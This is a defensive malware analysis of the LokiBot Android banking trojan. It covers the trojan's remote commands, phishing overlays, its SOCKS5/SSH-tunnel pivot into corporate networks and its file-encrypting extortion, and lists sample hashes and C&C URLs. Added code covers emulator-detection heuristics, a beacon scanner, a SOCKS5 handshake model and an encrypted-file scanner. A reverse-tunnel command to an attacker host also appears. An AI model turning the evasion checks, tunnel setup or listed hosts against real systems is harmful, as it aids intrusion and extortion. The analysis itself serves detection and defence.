Author: Qian Dun Anti-fraud Laboratory

0x1. Introduction to Trojan Horses

Recently, client-side detection surfaced the “LokiBot” Trojan. Qian Dun Anti-fraud Laboratory analysed it promptly and found that “LokiBot” evolved from “BankBot”. Compared with other banking-hijacking Trojans, “LokiBot” has some unique capabilities: it launches a different attack depending on the target environment, including interface hijacking, encrypting the data on the user's device and extorting money from the user, setting up a SOCKS5 proxy and SSH tunnel, and penetrating the enterprise Intranet to steal data.

LokiBot is distributed through malicious websites as fake application updates such as Adobe Flash Player, APK Installer, System Update, Adblock and Security Certificate, inducing the user to install it. The operation screenshot is as follows:




0x2. Sample analysis  

2.1 Malicious Code parsing

The key components and code blocks of LokiBot are as follows:



MainActivity: entry point of the malicious code. It performs an emulator check [1], hides the launcher icon, prompts the user to activate device administrator rights, and starts CommandService and InjectProcess.

Boot: a broadcast receiver that serves as a second entry point for the malicious code and keeps the core service CommandService alive.

CommandService: core service that executes malicious code according to the remote control instructions.

InjectProcess: interface hijacking service.

Crypt module: encrypts files and locks the device for extortion.

Socks module: implements the SOCKS5 protocol and an SSH tunnel to forward traffic between the Intranet the controlled device sits in and the attacker's host.
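As an added example (not code from the Trojan, and not the cited anti-emulator project's own code), the following shows what the emulator check in MainActivity typically looks at. It scores a set of Android system properties against the widely used Build.* heuristics and reports which properties a sandbox would have to spoof. Which of these checks LokiBot itself performs is not shown on this page, and both property sets below are constructed; real values come from `adb shell getprop`.

```python
"""Evaluate Android build properties for common emulator indicators.

Added example: encodes the usual Build.*/system-property heuristics so an
analyst can see what a sandbox must spoof before a sample like this one
will run its payload. Property sets are constructed, not captured.
"""
from typing import Callable, Dict, List, Tuple

# (system property backing the Build.* field, predicate on its value, reason)
EMULATOR_RULES: List[Tuple[str, Callable[[str], bool], str]] = [
    ("ro.build.fingerprint",
     lambda v: v.startswith("generic") or v.startswith("unknown"),
     "generic/unknown build fingerprint"),
    ("ro.product.model",
     lambda v: any(s in v for s in ("google_sdk", "Emulator", "Android SDK built for x86")),
     "SDK/emulator model string"),
    ("ro.product.manufacturer",
     lambda v: "Genymotion" in v,
     "Genymotion manufacturer"),
    ("ro.hardware",
     lambda v: v in ("goldfish", "ranchu", "vbox86"),
     "emulator kernel hardware name"),
    ("ro.product.device",
     lambda v: v.startswith("generic") or v == "vbox86p",
     "generic product device"),
    ("ro.product.brand",
     lambda v: v.startswith("generic"),
     "generic brand"),
    ("ro.kernel.qemu",
     lambda v: v == "1",
     "QEMU kernel flag set"),
]


def emulator_indicators(props: Dict[str, str]) -> List[str]:
    """Return a human-readable entry for every rule the property set trips."""
    hits = []
    for key, predicate, reason in EMULATOR_RULES:
        value = props.get(key, "")
        if value and predicate(value):
            hits.append(f"{key}={value!r}: {reason}")
    return hits


def looks_like_emulator(props: Dict[str, str], min_hits: int = 1) -> bool:
    """Malware usually bails on a single hit, so a sandbox should aim for zero."""
    return len(emulator_indicators(props)) >= min_hits


def props_to_spoof(props: Dict[str, str]) -> List[str]:
    """Property keys a sandbox operator would have to override for this image."""
    return sorted({hit.split("=", 1)[0] for hit in emulator_indicators(props)})


# Constructed: a stock x86 AVD image of the kind found on analysis sandboxes.
STOCK_AVD = {
    "ro.build.fingerprint": "generic/google_sdk/generic:4.4.2/KVT49L/937116:eng/test-keys",
    "ro.product.model": "google_sdk",
    "ro.product.manufacturer": "unknown",
    "ro.hardware": "goldfish",
    "ro.product.device": "generic",
    "ro.product.brand": "generic",
    "ro.kernel.qemu": "1",
}

# Constructed: a retail Samsung phone.
PHYSICAL_PHONE = {
    "ro.build.fingerprint": "samsung/dreamltexx/dreamlte:8.0.0/R16NW/G950FXXU1CRAP:user/release-keys",
    "ro.product.model": "SM-G950F",
    "ro.product.manufacturer": "samsung",
    "ro.hardware": "samsungexynos8895",
    "ro.product.device": "dreamlte",
    "ro.product.brand": "samsung",
}

if __name__ == "__main__":
    for name, props in (("STOCK_AVD", STOCK_AVD), ("PHYSICAL_PHONE", PHYSICAL_PHONE)):
        print(name, "->", "emulator" if looks_like_emulator(props) else "real device")
        for hit in emulator_indicators(props):
            print("   ", hit)
        print("    spoof:", props_to_spoof(props))
```

Feeding the output of `getprop` from your own sandbox into `emulator_indicators` tells you which properties the image still leaks; the Trojan only has to find one of them to skip its payload.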


2.2 Remote Control

The Trojan first uploads the device ID, screen-lock status and network type to the control end (for example **92500503912**:Loki:1:wifi). The control end uses the device ID as the bot ID and sends command data to trigger malicious behaviour. The instructions include:


| Instruction | Function |
|---|---|
| Send_SMS | Send malicious SMS messages to arbitrary numbers under the victim's identity |
| Send_USSD | Dial an arbitrary number |
| Go_Contacts | Upload the device contacts |
| Gethistori | Upload the browser history |
| Start_AllApp | Upload the package names of the installed applications |
| Update Bots | Update LokiBot |
| Forward_call | Configure call forwarding |
| Go_Leading_request | Load a malicious URL in a WebView |
| Go_Passwords | Set a screen-lock password |
| DeleteApp | Uninstall itself, deactivate device administration and trigger the extortion routine |
| Go_Smsmnd | Set LokiBot as the default SMS application |
| GetAllSms | Obtain the user's SMS messages |
| DellSms | Delete the latest SMS message |
| Send_spam | SMS worm: send malicious content to the user's contacts |
| App_call | Start an arbitrary app |
| Shells | Execute shell commands |
| Go_Crypt | Lock the device and encrypt the files on it |
| Go_Scrynlock | Lock the screen so the user cannot use the device |
| startSocks | Set up the SOCKS5 proxy |
| Start_Inject | Start InjectProcess to hijack banking applications |
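The check-in string and the C&C list at the end of this page are enough to write network detection for this family. The following is an added example, not part of the original analysis: it scans constructed HTTP proxy log lines of the form `<timestamp> <client ip> <method> <url> [body]`, flags requests to hosts and paths taken from the C&C list, and parses the check-in string `<deviceId>:Loki:<screen-lock state>:<network type>` described in 2.2. Assumptions: the check-in travels as the body of an HTTP POST, the lock-state field is 0/1 and the network field is a short token (all inferred from the single sample 92500503912:Loki:1:wifi).

```python
"""Flag LokiBot C&C traffic and check-ins in HTTP proxy logs (added example)."""
import re
from typing import Dict, List, Optional, Set
from urllib.parse import urlsplit

# Subset of the C&C hosts and paths listed on this page.
KNOWN_C2_HOSTS: Set[str] = {"updddatererb1.gdn", "tyfgbjyf.xyz", "185.209.20.28", "217.23.6.14"}
KNOWN_C2_PATHS: Set[str] = {"/sfdsdfsdf/", "/sdfsdfdsf/", "/adminlod/", "/dover/"}

# deviceId:Loki:<lock>:<network>; the field widths are assumptions (see lead-in).
BEACON_RE = re.compile(
    r"^(?P<device_id>\d{5,20}):Loki:(?P<locked>[01]):(?P<network>[A-Za-z0-9_]{1,16})$"
)


def parse_beacon(body: str) -> Optional[Dict[str, str]]:
    """Return the check-in fields, or None if the body is not a LokiBot beacon."""
    m = BEACON_RE.match(body.strip())
    return m.groupdict() if m else None


def analyse_request(ts: str, src: str, method: str, url: str, body: str) -> Optional[Dict]:
    """Score one request; returns a finding dict or None when nothing matched."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host in KNOWN_C2_HOSTS:
        reasons.append(f"known C2 host {host}")
    if parts.path in KNOWN_C2_PATHS:
        reasons.append(f"known C2 path {parts.path}")   # catches new hosts reusing the path
    beacon = parse_beacon(body) if method == "POST" else None
    if beacon:
        reasons.append("LokiBot check-in: device_id={device_id} locked={locked} "
                       "network={network}".format(**beacon))
    if not reasons:
        return None
    return {"ts": ts, "src": src, "url": url,
            "device_id": beacon["device_id"] if beacon else None,
            "reasons": reasons}


def scan_log(text: str) -> List[Dict]:
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(" ", 4)
        if len(fields) < 4:
            continue                      # malformed line, skip
        ts, src, method, url = fields[:4]
        body = fields[4] if len(fields) == 5 else ""
        hit = analyse_request(ts, src, method, url, body)
        if hit:
            findings.append(hit)
    return findings


def infected_hosts(findings: List[Dict]) -> Dict[str, Set[str]]:
    """Map client IP -> set of LokiBot device IDs seen checking in from it."""
    out: Dict[str, Set[str]] = {}
    for f in findings:
        if f["device_id"]:
            out.setdefault(f["src"], set()).add(f["device_id"])
    return out


# Constructed log: two infected clients, one of them talking to a host that is
# not on the C&C list but reuses the same path and beacon format.
SAMPLE_PROXY_LOG = """\
2018-02-01T10:00:01Z 10.0.0.5 POST http://updddatererb1.gdn/sfdsdfsdf/ 92500503912:Loki:1:wifi
2018-02-01T10:00:03Z 10.0.0.7 GET http://example.com/index.html
2018-02-01T10:00:09Z 10.0.0.9 POST http://cdn.example.net/sfdsdfsdf/ 3550001234567:Loki:0:mobile
2018-02-01T10:00:12Z 10.0.0.5 POST http://185.209.20.28/sdfsdfdsf/ 92500503912:Loki:1:wifi
2018-02-01T10:00:15Z 10.0.0.8 POST http://example.org/login user=bob&pass=x
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_PROXY_LOG)
    for h in hits:
        print(h["ts"], h["src"], h["url"], "|", "; ".join(h["reasons"]))
    print("infected:", infected_hosts(hits))
```

The third log line is the interesting one: its host is not in the C&C list, but the path and the check-in body are enough to flag it, which is why the beacon format is worth alerting on rather than host names alone.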


LokiBot chooses its attack based on the collected user data. There are three main attack methods:

  1. If banking or social apps are installed on the device, it launches application hijacking attacks;

  2. If the device is on an enterprise network, it penetrates the Intranet;

  3. It sends the DeleteApp or Go_Crypt command directly to carry out extortion.


2.3 Application Hijacking

The hijacking process is similar to that of the “BankBot” Trojan [2]: the Trojan uploads the list of installed applications, the attacker configures a hijacking interface for each target app in the cloud, and the Trojan monitors those applications in the background. Once the user opens an application on the hijacking list, a phishing interface pops up over the real application and induces the user to enter their account and password. Because the lifetime of this kind of Trojan is short, “LokiBot” also initiates application hijacking proactively, in two ways:

  1. Starting the application to be hijacked via a remote command;

  2. Popping up a fake notification for the target app; once the user taps it, the phishing interface appears.




2.4 Intranet Penetration

If the controlled device is in an Intranet environment, the control end issues the startSocks command and “LokiBot” establishes a SOCKS5 proxy and an SSH tunnel [3]. The attacker then uses the mobile device as a springboard into the Intranet to steal enterprise data.

“LokiBot” Trojan Intranet penetration process:

  1. The Trojan (SSH client) actively connects to the attacker's host (SSH server), establishes an SSH session and requests remote port forwarding. Traffic between SSH client and server travels inside the encrypted session, and because the connection is initiated outbound from the phone, the attacker can reach the device even though an inbound TCP connection would be blocked by firewall or NAT restrictions.

  2. The Trojan creates a listening socket that acts as the SOCKS server. When a connection arrives on the forwarded port on the attacker's host, the local SSH client (the Trojan itself) connects to that SOCKS socket and relays the data, so the attacker can reach Intranet hosts through the phone over the SSH tunnel.




Establish an SSH secure transmission tunnel

The startSocks command sent by the control end also carries the attacker's host IP address, the port on which the Trojan listens as the SOCKS server, and the user name and password the Trojan uses to log in to the attacker's host (SSH server). The Trojan creates an asynchronous task that uses the JSch library to connect to the attacker's host and set up the port forwarding.

 

Socks proxy

The Trojan implements the SOCKS5 protocol to forward traffic between Intranet servers and the attacker. The Intranet data the attacker accesses is carried back to the attacker through the SSH tunnel by the Trojan (SSH client).
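The following is an added example, not LokiBot's code, of the byte-level SOCKS5 CONNECT exchange (RFC 1928) that the proxy described in 2.4 has to implement, with both sides in one file: the attacker's SOCKS client builds the greeting and request, and the bot's server side parses them and answers. Real sockets are replaced by a constructed reachability table standing in for the Intranet, so the transcript can be inspected offline. The target hosts and ports are made up.

```python
"""SOCKS5 CONNECT handshake (RFC 1928), both sides, run in memory. Added example."""
import socket
import struct
from typing import Callable, List, Optional, Tuple

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00
METHOD_NONE_ACCEPTABLE = 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REP_SUCCESS, REP_GENERAL, REP_REFUSED = 0x00, 0x01, 0x05
REP_CMD_UNSUPPORTED, REP_ATYP_UNSUPPORTED = 0x07, 0x08


# ---- attacker side (SOCKS client, reached via the SSH remote forward) ----
def client_greeting() -> bytes:
    """VER NMETHODS METHODS: offer only 'no authentication'."""
    return bytes([SOCKS_VERSION, 1, METHOD_NO_AUTH])


def client_connect_request(host: str, port: int) -> bytes:
    """VER CMD RSV ATYP DST.ADDR DST.PORT; dotted quads go as IPv4, anything else as a domain."""
    try:
        addr, atyp = socket.inet_aton(host), ATYP_IPV4
    except OSError:
        raw = host.encode("idna")
        addr, atyp = bytes([len(raw)]) + raw, ATYP_DOMAIN
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00, atyp]) + addr + struct.pack("!H", port)


# ---- bot side (SOCKS server listening on the phone) ----
def server_select_method(greeting: bytes) -> bytes:
    """Answer VER METHOD; 0xFF tells the client none of its methods is acceptable."""
    if len(greeting) < 2 or greeting[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 greeting")
    nmethods = greeting[1]
    methods = greeting[2:2 + nmethods]
    if len(methods) != nmethods:
        raise ValueError("truncated greeting")
    chosen = METHOD_NO_AUTH if METHOD_NO_AUTH in methods else METHOD_NONE_ACCEPTABLE
    return bytes([SOCKS_VERSION, chosen])


def server_reply(rep: int) -> bytes:
    """VER REP RSV ATYP BND.ADDR BND.PORT; the bound address is zeroed in this model."""
    return bytes([SOCKS_VERSION, rep, 0x00, ATYP_IPV4]) + b"\x00\x00\x00\x00\x00\x00"


def server_handle_request(req: bytes, reachable: Callable[[str, int], bool]) -> bytes:
    """Parse a CONNECT request and reply; `reachable` stands in for socket.connect()."""
    if len(req) < 4 or req[0] != SOCKS_VERSION:
        return server_reply(REP_GENERAL)
    cmd, atyp = req[1], req[3]
    if cmd != CMD_CONNECT:                      # BIND / UDP ASSOCIATE not implemented
        return server_reply(REP_CMD_UNSUPPORTED)
    try:
        if atyp == ATYP_IPV4:
            if len(req) != 10:
                raise ValueError
            host, port = socket.inet_ntoa(req[4:8]), struct.unpack("!H", req[8:10])[0]
        elif atyp == ATYP_DOMAIN:
            n = req[4]
            if len(req) != 7 + n:
                raise ValueError
            host = req[5:5 + n].decode("idna")
            port = struct.unpack("!H", req[5 + n:7 + n])[0]
        else:                                   # IPv6 (or junk) not supported here
            return server_reply(REP_ATYP_UNSUPPORTED)
    except (ValueError, IndexError, UnicodeError):
        return server_reply(REP_GENERAL)
    return server_reply(REP_SUCCESS if reachable(host, port) else REP_REFUSED)


def proxy_handshake(host: str, port: int, reachable: Callable[[str, int], bool]
                    ) -> Tuple[List[Tuple[str, bytes]], Optional[int]]:
    """Run both sides; returns the transcript and the final REP code (None if auth failed)."""
    transcript: List[Tuple[str, bytes]] = []
    greeting = client_greeting()
    transcript.append(("attacker->bot", greeting))
    selection = server_select_method(greeting)
    transcript.append(("bot->attacker", selection))
    if selection[1] != METHOD_NO_AUTH:
        return transcript, None
    request = client_connect_request(host, port)
    transcript.append(("attacker->bot", request))
    reply = server_handle_request(request, reachable)
    transcript.append(("bot->attacker", reply))
    return transcript, reply[1]


# Constructed Intranet: (host, port) pairs the phone can reach.
INTRANET = {("10.0.0.10", 80), ("10.0.0.10", 443), ("fileserver.corp.local", 445)}


def intranet_reachable(host: str, port: int) -> bool:
    return (host, port) in INTRANET


if __name__ == "__main__":
    for target in (("10.0.0.10", 80), ("fileserver.corp.local", 445), ("10.0.0.99", 22)):
        transcript, rep = proxy_handshake(*target, intranet_reachable)
        print(target, "REP=0x%02x" % rep)
        for direction, msg in transcript:
            print("  ", direction, msg.hex(" "))
```

In the deployment in 2.4 the bot's server side sits behind the JSch remote forward (assuming the sample uses JSch's `Session.setPortForwardingR`, that library's remote-forward API; the page only says JSch sets up the forwarding), which is the equivalent of `ssh -R <remote port>:127.0.0.1:<socks port> user@attacker`. The attacker's SOCKS client therefore connects to a port on the attacker's own host, and the SSH session carries the bytes in the transcript to the phone. The bot never needs an inbound connection, which is why a firewall that only blocks inbound traffic does not stop this setup.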



2.5 Screen lock Extortion

After inducing the user to activate device administrator rights, LokiBot hides in the background and executes its malicious code. If the user notices the malware and tries to uninstall it, or the control end sends the DeleteApp or Go_Crypt command, the device lock is triggered and the files on the user's device are encrypted. In the following figure, device administrator rights are being disabled and CriptActivity$mainActivity is executed to carry out the screen-lock extortion.

The Trojan AES-encrypts every file under the SD card directory and deletes the originals.

By adding a View with the flags FLAG_WATCH_OUTSIDE_TOUCH | FLAG_LAYOUT_IN_SCREEN | FLAG_NOT_FOCUSABLE to the device window, the Trojan prevents the user from using the phone, then tells the user that the files on the device have been encrypted and that $70 must be paid in Bitcoin. The BTC payment address is hard-coded in a resource file. Looking up the address shows that it saw its first transaction in July 2015 and began transacting frequently in February of this year; recently the volume has been trending downward. In total it has 1341 transactions and a total income of 48.821 BTC.
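An added example for incident responders, not LokiBot's code: a triage scan for the aftermath of the encryption routine above. A payload that AES-encrypts every file under the SD card and deletes the originals leaves files with a near-uniform byte distribution and no recognisable header, so the scan computes Shannon entropy per file and flags files that are high-entropy, of non-trivial size and carry no known magic number (compressed formats such as zip and JPEG are also high-entropy but keep their header, which is the main false-positive source). The “SD card” is constructed in a temporary directory so the example runs offline, and the file names are arbitrary; the page does not say what extension, if any, the Trojan gives encrypted files.

```python
"""Triage a directory tree for signs of bulk file encryption (added example)."""
import math
import os
import shutil
import tempfile
from collections import Counter
from typing import Dict, List, Optional

KNOWN_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG": "png",
    b"PK\x03\x04": "zip/apk/docx",
    b"%PDF": "pdf",
    b"\x1f\x8b": "gzip",
    b"ID3": "mp3",
    b"RIFF": "wav/avi",
}
ENTROPY_THRESHOLD = 7.9   # bits per byte; ciphertext and random data approach 8.0
MIN_SIZE = 256            # entropy of tiny files is not meaningful


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def detect_magic(head: bytes) -> Optional[str]:
    for magic, name in KNOWN_MAGIC.items():
        if head.startswith(magic):
            return name
    return None


def classify_file(path: str, threshold: float = ENTROPY_THRESHOLD) -> Dict:
    with open(path, "rb") as fh:
        data = fh.read()
    entropy = shannon_entropy(data)
    magic = detect_magic(data[:8])
    return {
        "path": path,
        "size": len(data),
        "entropy": round(entropy, 3),
        "magic": magic,
        "suspicious": len(data) >= MIN_SIZE and magic is None and entropy >= threshold,
    }


def scan_tree(root: str, threshold: float = ENTROPY_THRESHOLD) -> List[Dict]:
    results = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            results.append(classify_file(os.path.join(dirpath, name), threshold))
    return results


def build_sample_tree() -> str:
    """Constructed SD card: a text file, a JPEG with a valid header, and a
    'photo' whose content has been replaced by ciphertext-like random bytes."""
    root = tempfile.mkdtemp(prefix="sdcard_")
    os.makedirs(os.path.join(root, "DCIM"))
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"Meeting notes: review Q1 budget and vendor contracts.\n" * 100)
    with open(os.path.join(root, "DCIM", "IMG_0001.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + os.urandom(8192))   # high entropy but has a header
    with open(os.path.join(root, "DCIM", "IMG_0002.jpg"), "wb") as fh:
        fh.write(os.urandom(8192))                          # stand-in for an encrypted file
    return root


def remove_sample_tree(root: str) -> None:
    shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    sd = build_sample_tree()
    try:
        for r in scan_tree(sd):
            flag = "SUSPICIOUS" if r["suspicious"] else "ok"
            rel = os.path.relpath(r["path"], sd)
            print(f"{flag:10} {r['entropy']:5.3f} {r['magic'] or '-':12} {rel}")
    finally:
        remove_sample_tree(sd)
```

Run `scan_tree` against a mounted image of the SD card rather than the live device, and treat the magic-number list as a starting point: any format your users store that is not in it will show up as suspicious if it compresses well.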


Sample sha256

97343643ed13e3aa680aaf6604ca63f447cdfc886b6692be6620d4b7cddb2a35

00d8b0b6676a3225bd184202649b4c1d66cd61237cfad4451a10397858c92fd3

b28252734dd6cbd2b9c43b84ec69865c5ee6daea25b521387cf241f6326f14a3

6fbecc9ecf39b0a5c1bc549f2690a0948c50f7228679af852546a1b2e9d80de6

b3c653d323a59645c30d756a36a5dd69eb36042fc17107e8b4985c813deabaf5

b2cc3b288d4bb855e64343317cf1560cb09f22322618c5ff9bdc9d9e70c8f335

f5a5f931e11af31fa22ef24ba0e4fff2600359498673d18b5eb321da1d5b31e0

bf13ee6be6e13e8a924ca9b85ad5078eafabf5b444b56fab2d5adcf3f8025891

fea63f4b85b4fd094a761cd10069d813c68428121b087f58db2ea273250ec39b

ab51dcd0629758743ed1aa48531a71852a49454cc9c90f37fbedb8c02547d258

a912166eaf2c8e0c3c87f17bb208f622a0b51bfa1124e5ba84f42a4adf7a96b4

1979d60ba17434d7b4b5403c7fd005d303831b1a584ea2bed89cfec0b45bd5c2

97d7c975ceb7f7478d521b0f35fdb4a14bd26c6dfde65e29533fdaf6d1ac9db6

1d828d3a89242513048546769f3c1394ff134b76ed08c7d8d9ec07e495cd14f5

1902424d09c9ddce312c84d166353199c5e6da97918b61616ec38431bdaa1359

b89892fe9fd306636cb79225ab260320b26b2313d1f415f885b8d6843fcc6919

e8714558ba46b2e44f1167baf0e427ed408c6946a045be245061f1a914869a27

418bdfa331cba37b1185645c71ee2cf31eb01cfcc949569f1addbff79f73be66

a9899519a45f4c5dc5029d39317d0e583cd04eb7d7fa88723b46e14227809c26

3c258581214d4321875218ed716d684d75e21d6fa5dc95c6109d6c76de513aca

a1f7498c8ae20452e25bb1731ab79f8226ed93713990496009cd9060954cea3c

3136fd5a06ad5b1cdc48ade31fe5fdce6c050e514f028db18230d31801592995

7ebebd2b83ea29668e14d29e89e96cf58665e01603b970823b2f4f97e7a2c159

e46aee4b737d1328b7811d5d6158a6e1629dc3b08d802378eaba7c63d47de78b

1e4795407db5f3084fcdc8ebb3a1486af4720495d85c5ebe6b8489fc9f20e372

1a18fc5f117c8240dce9379390fe5da27e6b135246dcb7ac37abb1acf47db0fe

92229e3b0c95ad4aee3cf9f0a2270aeb62cedd35869d726399fe980154782019

0f7fc30cc701bea7e6ffa541665670ff126a9b3bc0c55ea9bc51c461d8d629a8

b280c4b1954abc1979a67ee9c60fd8d8690921aa92ce217592a3b0653a7694c1

93c229c459fb13890bafc4fed2f1974948940d0cbc81ed64b4817a2c6619036e

0b5c854fceaccad3516ebb1a424d935d393fa2f2246f1704e36e8084e29949c8

c260e60567723af1dddc717a87cf2c24e1fdc7981ea379dd8f11f5a8f272e63c

a09d9d09090ea23cbfe202a159aba717c71bf2f0f1d6eed36da4de1d42f91c74

84136b96ee1487a3f763436c5e60591be321ac4dd953d2b9a03dbec908d1962a

c6acdb6a3df9522b688a7bb38e175b332639121d840305394f05f7f594b2917c

2bad6d8530601a8ab67dbc581184138b87d2c7cb3a63a1d15d7f774b3f4f9cd0

bc93d1c1dea582e039f9bcb99d506842c2c2a757b57ff7fda299eac079019bd8

7f4bbe3e6ba3a35e7a187369f5ed280de557e93121c85f2a9e4a8bb63ac8f7f2

77c149c2892adbf2e5c69374ccf24de22788afbc5800b3d3fcd332e3d2042de2

6eb92722e16840495363bb3f3e6bba6f2c6f30ad9eb8e891b90eb455dc5e3e91

794d79a549711e2eba0ebbf1d2720948295b3c5e21c5c3c39064abaa632e902e

09bad7c39020c29d68f9357812f2fb355750d3980c32c02f920f54ba42bb8726

8ef0edca1822d0460a34f59d564458ee3cc420afc7166612cb1a16eab01583e0

fb188fcd914e891f26985c0b19935ce5e5ca0c96a977e6c04df2a3c6c86d9ea8

7ed19d67d7ab8934aac1a125446d3132f1f4ccfb0c2419f333bdc90f8aef09c0

ce0c24d3c856e8f1c05f238aa5222fb11dbdfc562becdc0ff9ba2c7152860008

18da21d688317ba1eb704b9127757d1c9feeac362537fccd7e68ecb7e06adeb9

83497ac340f6e38b54395eacd8e02405fb5b28125b8537e74dbce1de3bef79d5

2e6b667076dec035e5ca19823697eb64b190a9009a2d21bfd5ed7374d32c21f0


C&C

http://updddatererb1.gdn/sfdsdfsdf/

http://tyfgbjyf.xyz/sfdsdfsdf/

http://dghooghel.com/sfdsdfsdf/

http://sdtyoty.gdn/sfdsdfsdf/

http://rthrew.gdn/sfdsdfsdf/

http://spirit7a.pw/sfdsdfsdf/

http://cofonderot.top/sfdsdfsdf/

http://sdfsdfsf.today/sfdsdfsdf/

http://sdfsdfsf.gdn/sfdsdfsdf/

http://dgdfgdfg.top/sfdsdfsdf

http://profitino365.com/sfdsdfsdf/

http://sdfsdgfsdfsdfsd.info/sfdsdfsdf/

http://showtopik.gdn/tosskd/

http://showtopik.xyz/kdlhoi/

http://showtopics.biz/saddasd/

http://tescoy.com/asffar929/

http://pornohab24.com/dklska/

http://185.209.20.28/sdfsdfdsf/

http://185.206.145.22/sfdsdfsdf/

http://185.165.29.29/dover/

http://185.110.132.60/sfdsdfsdf/

http://217.172.172.10/adminlod/

http://217.23.6.14/adminlod/

http://94.75.237.86/sfdsdfsdf/

http://85.93.6.104/sfdsdfsdfhfghf/

http://77.72.84.48/gslrmgt/


0x3 Security Suggestion

LokiBot is one example of attackers repeatedly using mobile devices as a springboard into the enterprise Intranet. Enterprises should therefore strengthen their defences, strictly restrict untrusted devices from connecting to the Intranet, and raise employees' security awareness. Ordinary users should download applications only from official websites or trusted application stores, should not click on pornographic links or on links sent by unfamiliar “friends” via SMS, QQ, WeChat and other chat tools, and should install security software and run virus scans regularly.


References

[1] Emulator detection

https://github.com/strazzere/anti-emulator

[2] New BankBot Trojan analysis

https://jaq.alibaba.com/community/art/show?articleid=783

BankBot AvPass analysis

https://jaq.alibaba.com/community/art/show?spm=a313e.7916648.0.0.3775bb8euvWFHg&articleid=1028

[3] SSH port forwarding in practice

https://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/